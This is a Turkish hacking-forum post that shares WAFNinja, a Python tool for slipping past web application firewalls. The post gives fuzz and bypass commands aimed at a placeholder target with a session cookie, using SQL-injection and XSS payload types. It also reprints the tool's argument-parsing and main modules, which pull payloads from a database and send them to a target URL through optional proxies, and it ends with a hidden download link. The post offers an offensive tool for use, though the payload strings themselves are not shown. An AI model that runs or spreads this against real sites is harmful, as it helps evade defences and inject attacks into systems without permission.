WaFNinja Web Uygulama Güvenlik Duvarı Aşma Kodu Python

1. [video=youtube]https://www.youtube.com/watch?v=nMOyvIWn5Y8[/video]
2.  
3. [video=youtube]https://www.youtube.com/watch?v=SD7ForrwUMY[/video]
4.  
5. [video=youtube]https://www.youtube.com/watch?v=iN8gg3QsZpk[/video]
6.  
7. https://www.cyberizm.org/cyberizm-wafninja-web-uygulama-guvenlik-duvari-asma-kodu-python.html
8.  
9. [img]http://i.hizliresim.com/1LEr9G.png[/img]
10.  
11. WafNinja Kullanımı =>
12.  
13. [code]wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ...[/code]
14.  
15. WafNinjaFuzz Kullanımı =>
16.  
17. [code]python wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ"
18. -c "phpsessid=value" -t xss -o output.html [/code]
19.  
20. WafNinja Fuzz Kodları =>
21.  
22. [code]:Program: WAFNinja
23. :ModuleName: argument
24. :Version: 1.0
25. :Revision: 1.0.0
26. :Author: Khalil Bijjou
27. :Description: The argument module processes the command line arguments and provides it to the main module (wafninja module).
28. """
29.  
30. import argparse
31. from argparse import RawTextHelpFormatter
32.  
33. def getArguments():
34. """
35. :Description: This function prints the start message and takes the arguments, which are passed by the user.
36. :return: The user input
37. """
38. parser = argparse.ArgumentParser(description='''
39.  
40. ___ ______________________ ______ ________
41. __ | / /__ |__ ____/__ | / /__(_)____________(_)_____ _
42. __ | /| / /__ /| |_ /_ __ |/ /__ /__ __ \____ /_ __ `/
43. __ |/ |/ / _ ___ | __/ _ /| / _ / _ / / /___ / / /_/ /
44. ____/|__/ /_/ |_/_/ /_/ |_/ /_/ /_/ /_/___ / \__,_/
45. /___/
46.  
47. WAFNinja - Penetration testers favorite for WAF Bypassing
48.  
49. Example Usage:
50. fuzz:\n\tpython wafninja.py fuzz -u "http://www.target.com/index.php?id=FUZZ" \n\t-c "phpsessid=value" -t xss -o output.html
51. bypass:\n\tpython wafninja.py bypass -u "http://www.target.com/index.php" \n\t-p "Name=PAYLOAD&Submit=Submit" \n\t-c "phpsessid=value" -t xss -o output.html
52. insert-fuzz:\n\tpython wafninja.py insert-fuzz -i select -e select -t sql
53. ''',formatter_class=RawTextHelpFormatter, version='WAFNinja 1.0')
54. subparser = parser.add_subparsers(help='Which function do you want to use?\n\n', dest='mode')
55. attack_fuzz_parser = subparser.add_parser("fuzz",help='check which symbols and keywords are allowed by the WAF.')
56. attack_payload_parser = subparser.add_parser("bypass",help='sends payloads from the database to the target.')
57. insert_fuzz_parser = subparser.add_parser("insert-fuzz",help='add a fuzzing string')
58. insert_bypass_parser = subparser.add_parser("insert-bypass",help='add a payload to the bypass list')
59. set_db_parser = subparser.add_parser("set-db",help='use another database file. Useful to share the same database with others.')
60.  
61. ## attack parser ##
62. attack_payload_parser.add_argument('-u',metavar='URL',help='Target URL (e.g. "www.target.com/index.php?id=PAYLOAD")\nNote: specify the position of the payload with the keyword PAYLOAD',required=True)
63. attack_payload_parser.add_argument('-p',metavar='POST PARAMETER',help='Send payload through post parameter ',required=False)
64. attack_payload_parser.add_argument('-c',metavar='COOKIE',help='HTTP Cookie Header',required=False)
65. attack_payload_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'],help='Type of payload [sql|xss]', required=True)
66. attack_payload_parser.add_argument('-d',metavar='DELAY',default='0',help="Wait the given delay time between each request [default=0]",required=False)
67. attack_payload_parser.add_argument('-w',metavar='WAF',help='Send payloads of certain WAF [default=generic]', required=False)
68. attack_payload_parser.add_argument('-o',metavar='OUTPUT FILE',help="Save output to .html file",required=False)
69. attack_payload_parser.add_argument('--proxy',metavar='PROXY',help='Use a proxy. Format: IP:PORT', required=False)
70. attack_payload_parser.add_argument('--prefix',metavar='PROXY',help='Add a prefix to every payload.', required=False)
71. attack_payload_parser.add_argument('--postfix',metavar='PROXY',help='Add a postfix to every payload.', required=False)
72.  
73. ## attack fuzz ##
74. attack_fuzz_parser.add_argument('-u',metavar='URL',help='Target URL (e.g. "www.target.com/index.php?id=FUZZ")\nNote: specify the position of the fuzz with the keyword FUZZ',required=True)
75. attack_fuzz_parser.add_argument('-p',metavar='POST PARAMETER',help='Send fuzz through post parameter ',required=False)
76. attack_fuzz_parser.add_argument('-c',metavar='COOKIE',help='HTTP Cookie Header',required=False)
77. attack_fuzz_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'],help='Type of payload [sql|xss]', required=True)
78. attack_fuzz_parser.add_argument('-d',metavar='DELAY',default=0,help="Wait the given delay time between each request [default=0]",required=False)
79. attack_fuzz_parser.add_argument('-o',metavar='OUTPUT FILE',help="Save output to .html file",required=False)
80. attack_fuzz_parser.add_argument('--proxy',metavar='PROXY',help='Use a proxy. Format: IP:PORT', required=False)
81. attack_fuzz_parser.add_argument('--prefix',metavar='PROXY',help='Add a prefix to every fuzz.', required=False)
82. attack_fuzz_parser.add_argument('--postfix',metavar='PROXY',help='Add a postfix to every fuzz.', required=False)
83.  
84. ## insert bypass parser ##
85. insert_bypass_parser.add_argument('-i',metavar='INPUT',help='Payload to insert',required=True)
86. insert_bypass_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'], help='Type of payload [sql|xss]',required=True)
87. insert_bypass_parser.add_argument('-w',metavar='WAF',help='WAF that was bypassed with this payload', required=False)
88.  
89. ## insert fuzz parser ##
90. insert_fuzz_parser.add_argument('-i',metavar='INPUT',help='Fuzz to insert',required=True)
91. insert_fuzz_parser.add_argument('-e',metavar='EXPECTED',help='Expected output from the target site. Use this option if input is encoded or something like that.',required=False)
92. insert_fuzz_parser.add_argument('-t',metavar='TYPE',choices=['sql','xss'], help='Type of payload [sql|xss]',required=True)
93.  
94. ## set database parser ##
95. set_db_parser.add_argument('-p',metavar='PATH',help='Path to sqlite database. The default location is "db/db.sqlite"',required=True)
96.  
97. args = parser.parse_args()
98.  
99.  
100. if args.mode == 'bypass':
101. url = args.u
102. post = args.p
103. cookie = args.c
104. type = args.t.lower()
105. delay = args.d
106. waf = args.w
107. if waf is not None:
108. waf = waf.lower()
109. outputFile = args.o
110. proxy = args.proxy
111. if proxy is None:
112. proxy = ''
113. prefix = args.prefix
114. if prefix is None:
115. prefix = ''
116. postfix = args.postfix
117. if postfix is None:
118. postfix = ''
119. return ['bypass', url, post, cookie, type, delay, waf, outputFile, proxy, prefix, postfix]
120.  
121. elif args.mode == 'fuzz':
122. url = args.u
123. post = args.p
124. cookie = args.c
125. type = args.t.lower()
126. delay = args.d
127. outputFile = args.o
128. proxy = args.proxy
129. if proxy is None:
130. proxy = ''
131. prefix = args.prefix
132. if prefix is None:
133. prefix = ''
134. postfix = args.postfix
135. if postfix is None:
136. postfix = ''
137. return ['fuzz', url, post, cookie, type, delay, outputFile, proxy, prefix, postfix]
138.  
139. elif args.mode == 'insert-bypass':
140. input = args.i
141. type = args.t
142. waf = args.w
143. if waf is not None:
144. waf = waf.lower()
145. return ['insert-bypass', input, type, waf]
146.  
147. elif args.mode == 'insert-fuzz':
148. input = args.i
149. if args.e is not None:
150. expected = args.e
151. else:
152. expected = args.i
153. type = args.t
154. return ['insert-fuzz', input, expected, type]
155.  
156. elif args.mode == 'set-db':
157. path = args.p
158. return ['set-db', path][/code]
159.  
160. WafNinja ByPass =>
161.  
162. [code]python wafninja.py bypass -u "http://www.target.com/index.php" -p "Name=PAYLOAD&Submit=Submit"
163. -c "phpsessid=value" -t xss -o output.html[/code]
164.  
165. WafNinja Fuzz Yerleştirme =>
166.  
167. [code]python wafninja.py insert-fuzz -i select -e select -t sql[/code]
168.  
169. Yardım Konsol Ana Kodları =>
170.  
171. [code]Which function do you want to use?
172.  
173. fuzz check which symbols and keywords are allowed by the WAF.
174. bypass sends payloads from the database to the target.
175. insert-fuzz add a fuzzing string
176. insert-bypass add a payload to the bypass list
177. set-db use another database file. Useful to share the same database with others.
178.  
179. optional arguments:
180. -h, --help show this help message and exit
181. -v, --version show program's version number and exit[/code]
182.  
183. WafNinja Kodu =>
184.  
185. [code] :Program: WAFNinja
186. :ModuleName: wafninja
187. :Version: 1.0
188. :Revision: 1.0.0
189. :Author: Khalil Bijjou
190. :Description: The wafninja module is the main module, that controls the flow of the program.
191. """
192.  
193. from argument import getArguments
194. from db.db import getPayload, setPayload, getFuzz, setFuzz
195. from db.setDB import testConnection, setDatabase
196. from ninja.bypass import firePayload
197. from ninja.fuzzer import fireFuzz
198.  
199. def setHeaders(cookie):
200. """
201. :Description: This function sets the cookie for the requests.
202. :param cookie: A Cookie String
203. :type cookie: String
204. :todo: Add also other header
205.  
206. """
207. if cookie is not None:
208. header.append(['Cookie',cookie])
209.  
210. def extractParams(input):
211. """
212. :Description: Takes the '-p' input and splits it into individual parameter
213. :param input: POST Parameter
214. :type input: String
215. :return: Dictionary with the parameter as elements
216. :note: This function is required to prepare the parameter for the firePayload() or fireFuzz() function
217.  
218. """
219. if input is None:
220. return None
221. input = input.split('&')
222. params = {}
223. for item in input:
224. params[item.split('=',1)[0]] = item.split('=',1)[1]
225. return params
226.  
227. arguments = getArguments()
228.  
229. if arguments[0] == 'bypass':
230. arguments.pop(0) # delete the string that indicates what function to use
231. url, post, cookie, type, delay, waf, outputFile, proxy, prefix, postfix = arguments
232. payload = getPayload(type, waf) # get strings from db
233. header = []
234. setHeaders(cookie)
235. post = extractParams(post)
236. firePayload(type, payload, url, post, header, delay, outputFile, proxy, prefix, postfix)
237.  
238. elif arguments[0] == 'fuzz':
239. arguments.pop(0) # delete the string that indicates what function to use
240. url, post, cookie, type, delay, outputFile, proxy, prefix, postfix = arguments
241. fuzz = getFuzz(type) # get strings from db
242. header = []
243. setHeaders(cookie)
244. post = extractParams(post)
245. fireFuzz(type, fuzz, url, post, header, delay, outputFile, proxy, prefix, postfix)
246.  
247. elif arguments[0] == 'insert-bypass':
248. arguments.pop(0)
249. input, type, waf = arguments
250. setPayload(input, type, waf)
251.  
252. elif arguments[0] == 'insert-fuzz':
253. arguments.pop(0)
254. input, expected, type = arguments
255. setFuzz(input, expected, type)
256.  
257. elif arguments[0] == 'set-db':
258. arguments.pop(0)
259. path = arguments[0]
260. if (testConnection(path) == 1):
261. setDatabase(path)
262. print "Database sucessfully changed!"[/code]
263.  
264. İndirme Linki =>
265.  
266. [hide][code]https://github.com/khalilbijjou/WAFNinja[/code][/hide]
267.  
268. ### Selam ve Duam ile - Mr. KingSkrupellos - Cyberizm.Org ###